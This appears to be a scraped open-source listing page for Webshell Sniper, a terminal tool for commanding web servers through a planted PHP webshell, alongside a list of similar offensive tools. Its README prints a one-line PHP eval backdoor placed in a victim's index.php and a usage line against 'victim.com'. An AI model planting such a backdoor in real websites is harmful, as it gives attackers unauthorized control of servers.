All Projects → WangYihang → Webshell Sniper

WangYihang / Webshell Sniper

Licence: gpl-3.0
🔨 Manage your website via terminal

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Webshell Sniper

Wsmanager
Webshell Manager
Stars: ✭ 99 (-72.42%)
Mutual labels:  security-tools, pentest, webshell
Catnip
Cat-Nip Automated Basic Pentest Tool - Designed For Kali Linux
Stars: ✭ 108 (-69.92%)
Mutual labels:  security-tools, pentest
Vxscan
python3写的综合扫描工具,主要用来存活验证,敏感文件探测(目录扫描/js泄露接口/html注释泄露),WAF/CDN识别,端口扫描,指纹/服务识别,操作系统识别,POC扫描,SQL注入,绕过CDN,查询旁站等功能,主要用来甲方自测或乙方授权测试,请勿用来搞破坏。
Stars: ✭ 1,244 (+246.52%)
Mutual labels:  security-tools, pentest
Sippts
Set of tools to audit SIP based VoIP Systems
Stars: ✭ 116 (-67.69%)
Mutual labels:  security-tools, pentest
Xattacker
X Attacker Tool ☣ Website Vulnerability Scanner & Auto Exploiter
Stars: ✭ 897 (+149.86%)
Mutual labels:  security-tools, pentest
Vulnx
vulnx 🕷️ is an intelligent bot auto shell injector that detect vulnerabilities in multiple types of cms { `wordpress , joomla , drupal , prestashop .. `}
Stars: ✭ 1,009 (+181.06%)
Mutual labels:  security-tools, pentest
Hacker Container
Container with all the list of useful tools/commands while hacking and pentesting Kubernetes Clusters
Stars: ✭ 105 (-70.75%)
Mutual labels:  security-tools, pentest
Ladon
大型内网渗透扫描器&Cobalt Strike,Ladon8.9内置120个模块,包含信息收集/存活主机/端口扫描/服务识别/密码爆破/漏洞检测/漏洞利用。漏洞检测含MS17010/SMBGhost/Weblogic/ActiveMQ/Tomcat/Struts2,密码口令爆破(Mysql/Oracle/MSSQL)/FTP/SSH(Linux)/VNC/Windows(IPC/WMI/SMB/Netbios/LDAP/SmbHash/WmiHash/Winrm),远程执行命令(smbexec/wmiexe/psexec/atexec/sshexec/webshell),降权提权Runas、GetSystem,Poc/Exploit,支持Cobalt Strike 3.X-4.0
Stars: ✭ 2,911 (+710.86%)
Mutual labels:  security-tools, pentest
Intrec Pack
Intelligence and Reconnaissance Package/Bundle installer.
Stars: ✭ 177 (-50.7%)
Mutual labels:  security-tools, pentest
O365spray
Username enumeration and password spraying tool aimed at Microsoft O365.
Stars: ✭ 133 (-62.95%)
Mutual labels:  security-tools, pentest
Dumpsterfire
"Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue- & Red Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
Stars: ✭ 775 (+115.88%)
Mutual labels:  security-tools, pentest
Findwebshell
findWebshell是一款基于python开发的webshell检测工具。
Stars: ✭ 246 (-31.48%)
Mutual labels:  security-tools, webshell
Diamorphine
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64)
Stars: ✭ 725 (+101.95%)
Mutual labels:  security-tools, pentest
Cloakify
CloakifyFactory - Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection
Stars: ✭ 1,136 (+216.43%)
Mutual labels:  security-tools, pentest
Jok3r
Jok3r v3 BETA 2 - Network and Web Pentest Automation Framework
Stars: ✭ 645 (+79.67%)
Mutual labels:  security-tools, pentest
Habu
Hacking Toolkit
Stars: ✭ 635 (+76.88%)
Mutual labels:  security-tools, pentest
Blackmamba
C2/post-exploitation framework
Stars: ✭ 544 (+51.53%)
Mutual labels:  security-tools, pentest
Ios
Most usable tools for iOS penetration testing
Stars: ✭ 563 (+56.82%)
Mutual labels:  security-tools, pentest
Jwtxploiter
A tool to test security of json web token
Stars: ✭ 130 (-63.79%)
Mutual labels:  security-tools, pentest
Oblivion
Data leak checker & OSINT Tool
Stars: ✭ 237 (-33.98%)
Mutual labels:  security-tools, pentest

Webshell-Sniper

A webshell manager via terminal

Backers on Open Collective Sponsors on Open Collective

Usage :

Usage : 
        python webshell-sniper.py [URL] [METHOD] [AUTH]
Example : 
        python webshell-sniper.py http://127.0.0.1/c.php POST c
Author : 
        WangYihang <[email protected]>
# cat /var/www/html/index.php
<?php eval($_POST['s3cr3t']);?>
# python webshell-sniper.py http://victim.com/index.php POST s3cr3t
...

Installation:

git clone https://github.com/WangYihang/Webshell-Sniper
cd Webshell-Sniper
pip install -r requirements.txt

Example :

v1.1.2

A Pentest Example via Webshell-Sniper (YouTube)

Compatibility :

Enviroment :
    Attacker :
        Linux
        python 2.7
    Victim :
        apache 2.4
        php 7.0

Addations:

  1. This tool only support to run on unix-like system.
  2. It is able to help user control web server which is running PHP or MySQL

Contributors

This project exists thanks to all the people who contribute.

Backers

Thank you to all our backers! 🙏 [Become a backer]

Sponsors

Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].